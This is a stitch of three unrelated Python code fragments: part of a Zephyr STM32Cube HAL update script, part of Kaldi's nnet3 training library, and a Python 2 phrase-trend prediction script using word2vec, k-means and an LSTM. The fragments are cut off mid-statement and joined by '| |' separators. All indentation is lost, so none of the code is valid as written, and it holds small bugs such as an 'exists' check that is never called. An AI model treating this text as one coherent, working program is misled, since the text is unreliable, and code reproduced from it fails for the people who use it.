temp_drivers_include_path = (
self.stm32cube_temp_serie / "drivers" / "include"
)
temp_drivers_include_path.parent.mkdir(parents=True)
stm32cube_driver_inc = (
self.stm32cube_serie_path
/ "Drivers"
/ Path(self.stm32_seriexx_upper + "_HAL_Driver")
/ "Inc"
)
os_cmd(
(
"cp",
"-r",
str(stm32cube_driver_inc),
str(temp_drivers_include_path),
)
)
# except for _hal_conf_template.h
hal_conf_template = [
f
for f in temp_drivers_include_path.iterdir()
if "hal_conf_template.h" in f.name
][0]
hal_conf_template_fullpath = (
temp_drivers_include_path / hal_conf_template
)
if hal_conf_template_fullpath.is_file():
hal_conf_fullpath = Path(
re.sub("_template", r"", str(hal_conf_template_fullpath))
)
if hal_conf_fullpath.exists():
hal_conf_fullpath.unlink()
hal_conf_template_fullpath.rename(hal_conf_fullpath)
temp_drivers_src_path = self.stm32cube_temp_serie / "drivers" / "src"
temp_drivers_src_path.mkdir()
stm32cube_drivers_src_path = (
self.stm32cube_serie_path
/ "Drivers"
/ Path(self.stm32_seriexx_upper + "_HAL_Driver")
/ "Src"
)
os_cmd(
(
"cp " +
"-r " +
str(stm32cube_drivers_src_path) + "/*.* " +
str(temp_drivers_src_path)
),
shell=True,
)
def build_from_current_cube_version(self):
"""Build a commit in temporary dir with STM32Cube version
corresponding to zephyr current hal version
"""
# reset the STM32Cube repo to this current version
os_cmd(
("git", "reset", "--hard", self.current_version),
cwd=self.stm32cube_serie_path,
)
# build the zephyr module from the stm32cube
self.extract_source()
logging.info(
"Building module from STM32Cube_repo " + self.current_version
)
if not self.stm32cube_temp_serie.parent.exists():
self.stm32cube_temp_serie.parent.mkdir(parents=True)
os_cmd(
("git", "add", "-A", "stm32cube/" + self.stm32_seriexx + "/*"),
cwd=self.stm32cube_temp,
)
os_cmd(
("git", "commit", "-am", '"module' + self.current_version + '"'),
cwd=self.stm32cube_temp,
)
def build_patch_from_current_zephyr_version(self):
"""Build patch between zephyr current hal version and
corresponding official STM32Cube version
"""
# clean-up the module
shutil.rmtree(str(self.stm32cube_temp_serie), onerror=remove_readonly)
# populate the new repo with this current zephyr module
os_cmd(
(
"cp",
"-rf",
str(self.zephyr_module_serie_path),
str(self.stm32cube_temp_serie),
)
)
# commit this current version module
os_cmd(("git", "add", "*"), cwd=self.stm32cube_temp)
os_cmd(("git", "commit", "-am", '"module"'), cwd=self.stm32cube_temp)
# Remove trailing space
os_cmd(
("git", "rebase", "--whitespace=fix", "HEAD~1"),
cwd=self.stm32cube_temp,
)
# generate a patch for files and _hal.conf.h file in the module
logging.info(
"Building patch from " + self.current_version + " to current module"
)
os_cmd(
"git diff --ignore-space-at-eol HEAD~1 >> module.patch",
shell=True,
cwd=self.stm32cube_temp,
)
os_cmd(("dos2unix", "module.patch"), cwd=self.stm32cube_temp)
hal_conf = (
self.stm32cube_temp_serie
/ "drivers"
/ "include"
/ Path(self.stm32_seriexx + "_hal_conf.h")
)
hal_conf_patch = self.stm32cube_temp / "hal_conf.patch"
if hal_conf.exists():
os_cmd(
(
"git " +
"diff " +
"HEAD@{1} " +
"-- " +
str(hal_conf) +
" >> " +
str(hal_conf_patch)
),
shell=True,
cwd=self.stm32cube_temp,
)
if hal_conf_patch.stat().st_size == 0:
hal_conf_patch.unlink()
else:
os_cmd(("dos2unix", str(hal_conf_patch)))
def update_readme(self, make_version, make_commit):
"""Update README file
Args:
make_version: latest STM32Cube version.
make_commit: Commit corresponding to latest STM32Cube version.
"""
see_release_note = True
readme_path = self.stm32cube_temp_serie / "README"
with readme_path.open(mode="r") as readme_prev:
lines = (x for x in readme_prev.read().splitlines())
readme_path.unlink()
# Write README from previous one if exists
with open(str(readme_path), "w") as readme_file:
for LineItem in lines:
# change version nb
if "status" in LineItem.lower():
readme_file.write("Status:\n")
readme_file.write(" version {0}\n".format(make_version))
next(lines) # skip next line
elif "commit" in LineItem.lower():
readme_file.write("Commit:\n")
readme_file.write(" {0}".format(make_commit))
next(lines) # skip next line
elif "URL" in LineItem.upper():
readme_file.write("URL:\n")
readme_file.write(
" https://github.com/STMicroelectronics/"
+ "STM32Cube{0}\n".format(self.serie)
)
next(lines) # skip next line
# change patch list with a link to the release_note.html
elif "Patch List" in LineItem:
readme_file.write("Patch List:\n")
readme_file.write(
"--> please check that the following list "
+ "is still valid:\n"
)
else:
if "See release_note.html from STM32Cube" in LineItem:
see_release_note = False
readme_file.write("{0}\n".format(LineItem))
# at the very end of the file :
if see_release_note:
readme_file.write("\n See release_note.html from STM32Cube\n")
readme_file.flush()
os_cmd(("dos2unix", str(readme_path)))
def copy_release_note(self):
"""Copy release_note.html file from STM32Cube to zephyr"""
release_note_src = self.stm32cube_serie_path / "Release_Notes.html"
release_note_dst = self.zephyr_module_serie_path / "release_note.html"
if release_note_dst.exists():
release_note_dst.unlink()
if release_note_src.exists:
release_note_src.rename(release_note_dst)
os_cmd(("dos2unix", str(release_note_dst)))
def update_cmakelist(self):
"""Update CMakeLists.txt file"""
cmakelists_path = self.stm32cube_temp_serie / "CMakeLists.txt"
if cmakelists_path.exists():
# build new CMakeLists.txt
with cmakelists_path.open("r") as cmakelists_old:
# this line is the copyright line
first_line = cmakelists_old.readline()
cmakelists_path.unlink()
else:
first_line = ""
logging.info("Create a new CMakeLists.txt file")
with cmakelists_path.open("w") as cmakelists_new:
if first_line:
cmakelists_new.write(first_line)
cmakelists_new.write("# Copyright (c) 2020 STMicroelectronics\n")
cmakelists_new.write("#\n")
cmakelists_new.write("# SPDX-License-Identifier: Apache-2.0\n")
cmakelists_new.write("\n")
src_path = self.stm32cube_temp_serie / "drivers" / "src"
source_files = list(src_path.iterdir())
source_files.sort()
cmakelists_new.write(
"zephyr_library_sources(soc/system_"
+ self.stm32_seriexx
+ | |
context ({0},{1}) '
'versus expected ({2},{3})'.format(
egs_left_context, egs_right_context,
left_context, right_context))
# the condition on the initial/final context is an equality condition,
# not an inequality condition, as there is no mechanism to 'correct' the
# context (by subtracting context) while copying the egs, like there is
# for the regular left-right context. If the user is determined to use
# previously dumped egs, they may be able to slightly adjust the
# --egs.chunk-left-context-initial and --egs.chunk-right-context-final
# options to make things matched up. [note: the model l/r context gets
# added in, so you have to correct for changes in that.]
if (egs_left_context_initial != left_context_initial or
egs_right_context_final != right_context_final):
raise Exception('The egs have incorrect initial/final (l,r) context '
'({0},{1}) versus expected ({2},{3}). See code from '
'where this exception was raised for more info'.format(
egs_left_context_initial, egs_right_context_final,
left_context_initial, right_context_final))
frames_per_eg_str = open('{0}/info/frames_per_eg'.format(
egs_dir)).readline().rstrip()
if not validate_chunk_width(frames_per_eg_str):
raise Exception("Invalid frames_per_eg in directory {0}/info".format(
egs_dir))
num_archives = int(open('{0}/info/num_archives'.format(
egs_dir)).readline())
return [egs_left_context, egs_right_context,
frames_per_eg_str, num_archives]
except (IOError, ValueError):
logger.error("The egs dir {0} has missing or "
"malformed files.".format(egs_dir))
raise
def compute_presoftmax_prior_scale(dir, alidir, num_jobs, run_opts,
presoftmax_prior_scale_power=-0.25):
# getting the raw pdf count
common_lib.run_job(
"""{command} JOB=1:{num_jobs} {dir}/log/acc_pdf.JOB.log \
ali-to-post "ark:gunzip -c {alidir}/ali.JOB.gz|" ark:- \| \
post-to-tacc --per-pdf=true {alidir}/final.mdl ark:- \
{dir}/pdf_counts.JOB""".format(command=run_opts.command,
num_jobs=num_jobs,
dir=dir,
alidir=alidir))
common_lib.run_job(
"""{command} {dir}/log/sum_pdf_counts.log \
vector-sum --binary=false {dir}/pdf_counts.* {dir}/pdf_counts \
""".format(command=run_opts.command, dir=dir))
for file in glob.glob('{0}/pdf_counts.*'.format(dir)):
os.remove(file)
pdf_counts = common_lib.read_kaldi_matrix('{0}/pdf_counts'.format(dir))[0]
scaled_counts = smooth_presoftmax_prior_scale_vector(
pdf_counts,
presoftmax_prior_scale_power=presoftmax_prior_scale_power,
smooth=0.01)
output_file = "{0}/presoftmax_prior_scale.vec".format(dir)
common_lib.write_kaldi_matrix(output_file, [scaled_counts])
common_lib.force_symlink("../presoftmax_prior_scale.vec",
"{0}/configs/presoftmax_prior_scale.vec".format(
dir))
def smooth_presoftmax_prior_scale_vector(pdf_counts,
presoftmax_prior_scale_power=-0.25,
smooth=0.01):
total = sum(pdf_counts)
average_count = total/len(pdf_counts)
scales = []
for i in range(len(pdf_counts)):
scales.append(math.pow(pdf_counts[i] + smooth * average_count,
presoftmax_prior_scale_power))
num_pdfs = len(pdf_counts)
scaled_counts = map(lambda x: x * float(num_pdfs) / sum(scales), scales)
return scaled_counts
def prepare_initial_network(dir, run_opts, srand=-3):
common_lib.run_job(
"""{command} {dir}/log/add_first_layer.log \
nnet3-init --srand={srand} {dir}/init.raw \
{dir}/configs/layer1.config {dir}/0.raw""".format(
command=run_opts.command, srand=srand,
dir=dir))
def verify_iterations(num_iters, num_epochs, num_hidden_layers,
num_archives, max_models_combine,
add_layers_period, num_jobs_final):
""" Verifies that number of iterations are sufficient for various
phases of training."""
finish_add_layers_iter = num_hidden_layers * add_layers_period
if num_iters <= (finish_add_layers_iter + 2):
raise Exception("There are insufficient number of epochs. "
"These are not even sufficient for "
"layer-wise discriminatory training.")
approx_iters_per_epoch_final = num_archives/num_jobs_final
# Note: it used to be that we would combine over an entire epoch,
# but in practice we very rarely would use any weights from towards
# the end of that range, so we are changing it to use not
# approx_iters_per_epoch_final, but instead:
# approx_iters_per_epoch_final/2 + 1,
# dividing by 2 to use half an epoch, and adding 1 just to make sure
# it's not zero.
# First work out how many iterations we want to combine over in the final
# nnet3-combine-fast invocation.
# The number we use is:
# min(max(max_models_combine, approx_iters_per_epoch_final/2+1),
# 1/2 * iters_after_last_layer_added)
# But if this value is > max_models_combine, then the models
# are subsampled to get these many models to combine.
half_iters_after_add_layers = (num_iters - finish_add_layers_iter)/2
num_iters_combine_initial = min(approx_iters_per_epoch_final/2 + 1,
half_iters_after_add_layers)
if num_iters_combine_initial > max_models_combine:
subsample_model_factor = int(
float(num_iters_combine_initial) / max_models_combine)
num_iters_combine = num_iters_combine_initial
models_to_combine = set(range(
num_iters - num_iters_combine_initial + 1,
num_iters + 1, subsample_model_factor))
models_to_combine.add(num_iters)
else:
subsample_model_factor = 1
num_iters_combine = min(max_models_combine,
half_iters_after_add_layers)
models_to_combine = set(range(num_iters - num_iters_combine + 1,
num_iters + 1))
return models_to_combine
def get_learning_rate(iter, num_jobs, num_iters, num_archives_processed,
num_archives_to_process,
initial_effective_lrate, final_effective_lrate):
if iter + 1 >= num_iters:
effective_learning_rate = final_effective_lrate
else:
effective_learning_rate = (
initial_effective_lrate
* math.exp(num_archives_processed
* math.log(final_effective_lrate
/ initial_effective_lrate)
/ num_archives_to_process))
return num_jobs * effective_learning_rate
def do_shrinkage(iter, model_file, shrink_saturation_threshold,
get_raw_nnet_from_am=True):
if iter == 0:
return True
if get_raw_nnet_from_am:
output, error = common_lib.run_kaldi_command(
"nnet3-am-info --print-args=false {0} | "
"steps/nnet3/get_saturation.pl".format(model_file))
else:
output, error = common_lib.run_kaldi_command(
"nnet3-info --print-args=false {0} | "
"steps/nnet3/get_saturation.pl".format(model_file))
output = output.strip().split("\n")
try:
assert len(output) == 1
saturation = float(output[0])
assert saturation >= 0 and saturation <= 1
except:
raise Exception("Something went wrong, could not get "
"saturation from the output '{0}' of "
"get_saturation.pl on the info of "
"model {1}".format(output, model_file))
return (saturation > shrink_saturation_threshold)
def remove_nnet_egs(egs_dir):
common_lib.run_job("steps/nnet2/remove_egs.sh {egs_dir}".format(
egs_dir=egs_dir))
def clean_nnet_dir(nnet_dir, num_iters, egs_dir,
preserve_model_interval=100,
remove_egs=True,
get_raw_nnet_from_am=True):
try:
if remove_egs:
remove_nnet_egs(egs_dir)
for iter in range(num_iters):
remove_model(nnet_dir, iter, num_iters, None,
preserve_model_interval,
get_raw_nnet_from_am=get_raw_nnet_from_am)
except (IOError, OSError):
logger.error("Error while cleaning up the nnet directory")
raise
def remove_model(nnet_dir, iter, num_iters, models_to_combine=None,
preserve_model_interval=100,
get_raw_nnet_from_am=True):
if iter % preserve_model_interval == 0:
return
if models_to_combine is not None and iter in models_to_combine:
return
if get_raw_nnet_from_am:
file_name = '{0}/{1}.mdl'.format(nnet_dir, iter)
else:
file_name = '{0}/{1}.raw'.format(nnet_dir, iter)
if os.path.isfile(file_name):
os.remove(file_name)
def self_test():
assert halve_minibatch_size_str('64') == '32'
assert halve_minibatch_size_str('64,16:32') == '32,8:16'
assert halve_minibatch_size_str('1') == '1'
assert halve_minibatch_size_str('128=64/256=40,80:100') == '128=32/256=20,40:50'
assert validate_chunk_width('64')
assert validate_chunk_width('64,25,128')
class CommonParser:
"""Parser for parsing common options related to nnet3 training.
This argument parser adds common options related to nnet3 training
such as egs creation, training optimization options.
These are used in the nnet3 train scripts
in steps/nnet3/train*.py and steps/nnet3/chain/train.py
"""
parser = argparse.ArgumentParser(add_help=False)
def __init__(self,
include_chunk_context = True,
default_chunk_left_context=0):
# feat options
self.parser.add_argument("--feat.online-ivector-dir", type=str,
dest='online_ivector_dir', default=None,
action=common_lib.NullstrToNoneAction,
help="""directory with the ivectors extracted
in an online fashion.""")
self.parser.add_argument("--feat.cmvn-opts", type=str,
dest='cmvn_opts', default=None,
action=common_lib.NullstrToNoneAction,
help="A string specifying '--norm-means' "
"and '--norm-vars' values")
# egs extraction options. there is no point adding the chunk context
# option for non-RNNs (by which we mean basic TDNN-type topologies), as
# it wouldn't affect anything, so we disable them if we know in advance
# that we're not supporting RNN-type topologies (as in train_dnn.py).
if include_chunk_context:
self.parser.add_argument("--egs.chunk-left-context", type=int,
dest='chunk_left_context',
default=default_chunk_left_context,
help="""Number of additional frames of input
to the left of the input chunk. This extra
context will be used in the estimation of RNN
state before prediction of the first label. In
the case of FF-DNN this extra context will be
used to allow for frame-shifts""")
self.parser.add_argument("--egs.chunk-right-context", type=int,
dest='chunk_right_context', default=0,
help="""Number of additional frames of input
to the right of the input chunk. This extra
context will be used in the estimation of
bidirectional RNN state before prediction of
the first label.""")
self.parser.add_argument("--egs.chunk-left-context-initial", type=int,
dest='chunk_left_context_initial', default=-1,
help="""Number of additional frames of input
to the left of the *first* input chunk extracted
from an utterance. If negative, defaults to
the same as --egs.chunk-left-context""")
self.parser.add_argument("--egs.chunk-right-context-final", type=int,
dest='chunk_right_context_final', default=-1,
help="""Number of additional frames of input
to the right of the *last* input chunk extracted
from an utterance. If negative, defaults to the
same as --egs.chunk-right-context""")
self.parser.add_argument("--egs.transform_dir", type=str,
dest='transform_dir', default=None,
action=common_lib.NullstrToNoneAction,
help="String to provide options directly to "
"steps/nnet3/get_egs.sh script")
self.parser.add_argument("--egs.dir", type=str, dest='egs_dir',
default=None,
action=common_lib.NullstrToNoneAction,
help="""Directory with egs. If specified this
directory will be used rather than extracting
egs""")
self.parser.add_argument("--egs.stage", type=int, dest='egs_stage',
default=0,
help="Stage at which get_egs.sh should be "
"restarted")
self.parser.add_argument("--egs.opts", type=str, dest='egs_opts',
default=None,
action=common_lib.NullstrToNoneAction,
help="""String to provide options directly
to steps/nnet3/get_egs.sh script""")
# trainer options
self.parser.add_argument("--trainer.srand", type=int, dest='srand',
default=0,
help="""Sets the random seed for model
initialization and egs shuffling.
Warning: This random seed does not control all
aspects of this experiment. There might be
other random seeds used in other stages of the
experiment like data preparation (e.g. volume
perturbation).""")
self.parser.add_argument("--trainer.num-epochs", type=float,
dest='num_epochs', default=8.0,
help="Number of epochs to train the model")
self.parser.add_argument("--trainer.shuffle-buffer-size", type=int,
dest='shuffle_buffer_size', default=5000,
help=""" Controls randomization of the samples
on each iteration. If 0 or a large value the
randomization is complete, but this will
consume memory and cause spikes in disk I/O.
Smaller is easier on disk and memory but less
random. It's not a huge deal though, as
samples are anyway randomized right at the
start. (the point of this is to get data in
different minibatches on different iterations,
since in the preconditioning method, 2 samples
in the same minibatch can affect each others'
gradients.""")
self.parser.add_argument("--trainer.add-layers-period", type=int,
dest='add_layers_period', default=2,
help="""The number of iterations between
adding layers during layer-wise discriminative
training.""")
self.parser.add_argument("--trainer.max-param-change", type=float,
dest='max_param_change', default=2.0,
help="""The maximum change in parameters
allowed per minibatch, measured in Frobenius
norm over the entire model""")
self.parser.add_argument("--trainer.samples-per-iter", type=int,
dest='samples_per_iter', default=400000,
help="This is really the number of egs in "
"each archive.")
self.parser.add_argument("--trainer.lda.rand-prune", type=float,
dest='rand_prune', default=4.0,
help="Value used in preconditioning "
"matrix estimation")
self.parser.add_argument("--trainer.lda.max-lda-jobs", type=float,
dest='max_lda_jobs', default=10,
help="Max number of jobs used | |
import os
import sys
import json
import numpy as np
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
import matplotlib.pyplot as plt
from collections import Counter
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import KFold
from sklearn.cluster import KMeans
from gensim import corpora, models
import math
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import SimpleRNN
from keras.layers import Embedding
def writeScore(dictFile, fileName):
theFile = open(fileName, "w")
for item in dictFile:
theFile.write("%s: " % str(item))
theFile.write("%s\n" % str(dictFile[item]))
theFile.close()
return
def writeList(listFile, fileName):
theFile = open(fileName, "w")
for item in listFile:
theFile.write("%s\n" % str(item))
theFile.close()
return
def writeWordEmbLists(wordembsamplesArray, wordembsamplesArrayPredict, fileName):
tf = open(fileName, "w")
years = len(wordembsamplesArray)
phrases = len(wordembsamplesArray[0])
totalSpaces = 35
finalYear = 2014
startingYear = finalYear - years
for yearIndex in range(years):
tf.write("%s Actual -------------------- Predict\n" % str(startingYear + yearIndex))
for phraseIndex in range(phrases):
actualPhrase = wordembsamplesArray[yearIndex][phraseIndex]
if actualPhrase in wordembsamplesArrayPredict[yearIndex]:
actualPhrase += "\t++"
remainingSpaces = totalSpaces - len(actualPhrase)
tf.write("%s" % actualPhrase)
for n in range(remainingSpaces):
tf.write(" ")
predictPhrase = wordembsamplesArrayPredict[yearIndex][phraseIndex]
if predictPhrase in wordembsamplesArray[yearIndex]:
predictPhrase += "\t++"
tf.write("%s\n" % predictPhrase)
tf.write("\n\n")
tf.close()
return
def writeTopPhrasesList(topPhrases, baseYear, fileName):
tf = open(fileName, "w")
index = 0
for yearPhrase in topPhrases:
tf.write("%s: \n" % str(index + baseYear))
for topic in yearPhrase:
for phrase in topic:
tf.write("%s\n" % str(phrase.encode('utf-8')))
tf.write("\n")
tf.write("\n")
index += 1
tf.close()
return
def readVocabSeries(fileName):
fp = open(fileName, 'r')
vocabList = []
for line in fp:
vocab = line.strip("\n").split(", ")
vocabList.append(vocab)
fp.close()
return vocabList
def readTimeSeriesData(fileName):
fp = open(fileName, "r")
phraseList = []
timeSeries = []
for line in fp:
temp = line.replace("nan ", "0 ").split(":")
phraseList.append(temp[0])
timeSeries.append([float(ele) for ele in temp[1].split(" ")])
return phraseList, timeSeries
def splitData2(timeSeries, windowSize):
resultXList = []
resultYList = []
tempLine = timeSeries[0]
size = len(tempLine) - windowSize
# print size
seriesSize = len(timeSeries)
# print seriesSize
for index in range(size):
resultX = []
resultY = []
for lineIndex in range(seriesSize):
training = timeSeries[lineIndex][index: index + windowSize]
# temp = training[-1]
# training.append(temp ** 2)
# for windowStep in range(windowSize):
# training.append(training[windowStep] ** 2)
# for intermediate in range(windowSize - 1):
# training.append(training[intermediate + 1] - training[intermediate])
training = addFeatures(training, 5)
training.insert(0, lineIndex)
resultX.append(training)
resultY.append(timeSeries[lineIndex][index + windowSize])
resultXList.append(resultX)
resultYList.append(resultY)
return resultXList, resultYList, size
def splitData3(timeSeries, windowSize):
resultX = []
resultY = []
powerTerms = []
tempLine = timeSeries[0]
size = len(tempLine) - windowSize
seriesSize = len(timeSeries)
for index in range(size):
for lineIndex in range(seriesSize):
training = timeSeries[lineIndex][index: index + windowSize]
# training = addFeaturesKF(training, 4)
# powerTerms.append(combination(training))
training.insert(0, lineIndex) # format of data: [year index, phrase index, scores]
training.insert(0, index)
resultX.append(training)
resultY.append(timeSeries[lineIndex][index + windowSize])
return resultX, resultY, powerTerms, size
def combination(currentTrainingSample):
''' The power set iterates through all the possible combination of additional features '''
powerset = []
windowSize = len(currentTrainingSample)
for i in range(windowSize):
for j in range(i, windowSize):
powerset.append(currentTrainingSample[i] * currentTrainingSample[j])
return powerset
def generatePowerset(s):
resultList = []
x = len(s)
for i in range(1<<x):
resultList.append([s[j] for j in range(x) if (i & (1 << j))])
return resultList
def mapPhraseListUsingIndex(phraseIndexList, phraseList):
# result = [phraseList[ele] for ele in phraseIndexList]
result = []
for index in range(len(phraseList)):
if index in phraseIndexList:
result.append(phraseList[index])
return result
def writePhraseListTotal(phraseList, fileName):
tf = open(fileName, "w")
for phraseListThisYear in phraseList:
for phraseListSub in phraseListThisYear:
tf.write("%s\n" % str(phraseListSub))
tf.write("\n")
tf.close()
return
def isSubarray(small, big):
windowSize = len(small)
steps = len(big) - windowSize + 1
for startingIndex in range(steps):
testArray = big[startingIndex:startingIndex + windowSize]
if np.array_equal(testArray, small):
return True
return False
def checkPrecisionRecall(Xdata, Ydata, Yprediction):
Xdata = np.asarray(Xdata)
Ydata = np.asarray(Ydata)
Yprediction = np.asarray(Yprediction)
maxXdata = np.amax(Xdata, axis = 1)
actualDist = maxXdata < Ydata
predictDist = maxXdata < Yprediction
TP = np.count_nonzero(actualDist * predictDist)
TN = np.count_nonzero(actualDist) - TP
precision, recall, f1 = 0, 0, 0
if np.count_nonzero(predictDist) != 0:
precision = np.float(TP) / np.count_nonzero(predictDist)
else:
precision = 'NA'
if np.count_nonzero(actualDist) != 0:
recall = np.float(TP) / np.count_nonzero(actualDist)
else:
recall = 'NA'
if precision != 'NA' and recall != 'NA' and (precision + recall) > 0:
f1 = 2 * (precision * recall) / (precision + recall)
return precision, recall, f1
def retrieveTrendingIndices(Xdata, Ydata, Yprediction):
Xdata = np.asarray(Xdata)
Ydata = np.asarray(Ydata)
Yprediction = np.asarray(Yprediction)
maxXdata = np.amax(Xdata, axis = 1)
actualDist = maxXdata < Ydata
predictDist = maxXdata < Yprediction
actualDist = Ydata - maxXdata
predictDist = Yprediction - maxXdata
def filterNonZero(x):
if x <= 0:
return 0
return x
actualDist = np.asarray([filterNonZero(x) for x in actualDist])
predictDist = np.asarray([filterNonZero(x) for x in predictDist])
TPdist = np.asarray(actualDist * predictDist)
actualDistIndices = np.argpartition(actualDist, -20)[-20:]
predictDistIndices = np.argpartition(predictDist, -20)[-20:]
TPDistIndices = np.argpartition(TPdist, -20)[-20:]
return actualDistIndices, predictDistIndices, TPDistIndices
def calcMRRMAPNDCG(actualIndices, predictIndices):
# predictIndices = actualIndices[:]
# print actualIndices
# print predictIndices
scores = np.asarray([float(1) / (i + 1) for i in range(len(actualIndices))])
predictScores = np.asarray([0 for n in range(len(actualIndices))],dtype=float)
num = len(actualIndices)
DCG_GT = scores[0]
for index in range(1, num):
DCG_GT += (scores[index] / math.log((index + 1), 2))
mask = actualIndices == predictIndices
predictScores[mask] = scores[mask]
# for actualIndex in actualIndices:
# if actualIndex in predictIndices:
# i, = np.where(predictIndices == actualIndex)
# i = i[0]
# j, = np.where(actualIndices == actualIndex)
# j = j[0]
# predictScores[i] = scores[j]
# predictScores[i] = 1
# print "actual score: %f" % scores[j]
# print "predict score: %f" % predictScores[i]
DCG_Pred = predictScores[0]
for index in range(1, num):
DCG_Pred += (predictScores[index] / math.log((index + 1), 2))
nDCG = DCG_Pred / DCG_GT
print "GT: %f" % DCG_GT
print "Pr: %f" % DCG_Pred
return nDCG
def scale(originalData):
npData = np.array(originalData)
currMin = npData.min()
currMax = npData.max()
result = (npData - currMin) / (currMax - currMin)
return result
def scale2DArray(originalData):
npData = np.array(originalData)
result = []
for currRow in npData:
currMin = currRow.min()
currMax = currRow.max()
result.append((currRow - currMin) / (currMax - currMin))
result = np.array(result)
return result
def formWordEmbeddingTrainingData(seqOfPhrases, emb, embvocab):
windowSize = 3
decayingWeights = [0.8 ** n for n in range(windowSize)][::-1]
predefinedK = 20
totalYear = len(seqOfPhrases)
resultX = []
resultY = []
fullResultX = []
fullResultY = []
for yearIndex in range(totalYear - windowSize):
print "Currently processing year: " + str(yearIndex)
yearWords = [seqOfPhrases[yearIndex + n] for n in range(windowSize + 1)]
# year1Words = seqOfPhrases[yearIndex]
# year2Words = seqOfPhrases[yearIndex + 1]
# year3Words = seqOfPhrases[yearIndex + 2]
# year4Words = seqOfPhrases[yearIndex + 3]
for phraseIndex in range(predefinedK):
print "getting phrases: " + str(phraseIndex)
currYearWords = [yearWords[n][:(phraseIndex + 1)] for n in range(windowSize + 1)]
# currYear1Words = year1Words[:(phraseIndex + 1)]
# currYear2Words = year2Words[:(phraseIndex + 1)]
# currYear3Words = year3Words[:(phraseIndex + 1)]
# currYear4Words = year4Words[:(phraseIndex + 1)]
currYearMatrices = [[] for n in range(windowSize + 1)]
currYearMatrices = map(lambda x: np.asarray([emb.wv[ele] for ele in x if ele in embvocab]), currYearWords)
# for currYearWordList in currYearWords:
# for currYearWord in currYearWordList:
# if currYearWord in embvocab:
# currYearVector = emb.wv[currYearWord]
currYearVectors = [np.average(innerMatrix, axis = 0) for innerMatrix in currYearMatrices]
trainingY = currYearVectors.pop()
trainingX = np.average(np.asarray(currYearVectors), axis = 0, weights = decayingWeights)
resultX.append(trainingX)
resultY.append(trainingY)
if phraseIndex == (predefinedK - 1):
fullResultX.append(trainingX)
fullResultY.append(trainingY)
return np.asarray(resultX), np.asarray(resultY), np.asarray(fullResultX), np.asarray(fullResultY)
def trainEmbWords(trainX, trainY, fullX):
model = Sequential()
lookback = len(trainX[0])
trainXLSTM = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
trainFullX = np.reshape(fullX, (fullX.shape[0], 1, fullX.shape[1]))
print "Training LSTM for word embeddings"
model.add(LSTM(200, return_sequences = True, input_shape = trainXLSTM.shape[1:]))
# model.add(Dropout(0.5))
model.add(LSTM(200, return_sequences = True))
# model.add(Dropout(0.5))
model.add(LSTM(200))
# model.add(Dropout(0.5))
model.add(Dense(lookback))
model.compile(loss="mean_squared_error", optimizer = "rmsprop")
model.fit(trainXLSTM, trainY, epochs = 500, batch_size = 10, verbose = 2)
fullYPredict = model.predict(trainFullX)
return fullYPredict
def prepareWordWithGoogleMatrix(wordList, timeSeries, baseYear, vocabTfIdfSeriesMap, clusters):
yearCover = len(timeSeries[0])
phraseCount = len(wordList)
result = [[0.0 for n in range(yearCover)] for i in range(phraseCount)]
model = models.KeyedVectors.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True)
# vocabSeries = readVocabSeries("single/vocabSeries.txt")
vectorShape = model.wv['the'].shape
vectors = []
topPhrases = []
timeSeries = np.asarray(timeSeries)
wordListCopy = list(wordList)
wordList = np.asarray(wordList)
for yearIndex in range(yearCover):
predefinedNumOfClusters = clusters
# vocab = vocabSeries[index]
currVocab = wordList[np.nonzero(timeSeries[:, yearIndex])[0]]
vectors = []
missingList = []
for NP in currVocab:
try:
words = NP.split(" ")
tfIdfSum = 0.0
vectorSum = np.zeros(vectorShape) # initialize the zero vector
for individualWord in words:
currVector = model.wv[individualWord]
currTfIdf = vocabTfIdfSeriesMap[individualWord][yearIndex]
# print individualWord
# print currTfIdf
tfIdfSum += currTfIdf
vectorSum = vectorSum + currVector * currTfIdf
# print vectorSum
vectors.append(vectorSum / tfIdfSum)
except KeyError, e:
print "The error is: %s, in year %d" % (e, yearIndex + baseYear)
missingList.append(NP)
pass
currVocab = currVocab.tolist()
for missingNP in missingList:
currVocab.remove(missingNP)
print "Now running K Means"
numOfClusters = predefinedNumOfClusters if len(vectors) > predefinedNumOfClusters else len(vectors)
# print vectors
print np.array(vectors)
try:
kmeans = KMeans(n_clusters = numOfClusters, random_state = 0).fit(np.array(vectors))
except ValueError, e:
print "The array problem is: %s, in year %d" % (e, yearIndex + baseYear)
continue
print "Finished running K Means"
centers = kmeans.cluster_centers_
smallestDistance = 100.0
for phraseIndex in range(len(currVocab)):
word = currVocab[phraseIndex]
vector = vectors[phraseIndex]
label = kmeans.labels_[phraseIndex]
centroid = centers[label]
distance = np.linalg.norm(vector - centroid)
# if distance == 0.0:
# distance = smallestDistance / 100 # think about another way to do this, otherwise is magic number
# elif distance < smallestDistance:
# smallestDistance = distance
# relativeness = 1.0 / distance
relativeness = cossim(vector, centroid)
if word in wordListCopy:
# newListIndex = np.where(wordList == word)[0]
newListIndex = wordListCopy.index(word)
result[newListIndex][yearIndex] = relativeness
currTopPhrases = []
for center in centers:
topKeyphrases = [ele[0] for ele in model.similar_by_vector(center, topn = 10)]
currTopPhrases.append(topKeyphrases)
topPhrases.append(currTopPhrases)
return result, topPhrases
def preparePhraseRelativenessMatrix(phraseList, timeSeries, baseYear):
yearCover = len(timeSeries[0])
phraseCount = len(phraseList)
result = [[0 for n in range(yearCover)] for i in range(phraseCount)]
embFileList = os.listdir('single/emblistflat/')
continuousEmbFileList = os.listdir('single/emblist/')
topPhrases = []
vocabMap = {}
for fileName in embFileList:
year = int(fileName.split("-")[1])
print "processing file iter 1: %s" % str(year)
model = models.Word2Vec.load('single/emblistflat/' + fileName)
vocab = list(model.wv.vocab)
vocabMap[year] = vocab
# vectors = []
# for word in vocab:
# vectors.append(model.wv[word])
# kmeans = KMeans(n_clusters = 5, random_state = 0).fit(np.array(vectors))
# centers = kmeans.cluster_centers_
# for phraseIndex in range(len(vocab)):
# word = vocab[phraseIndex]
# vector = vectors[phraseIndex]
# label = kmeans.labels_[phraseIndex]
# centroid = centers[label]
# distance = np.linalg.norm(vector - centroid)
# relativeness = 1.0 / distance
# if word in phraseList:
# newListIndex = phraseList.index(word)
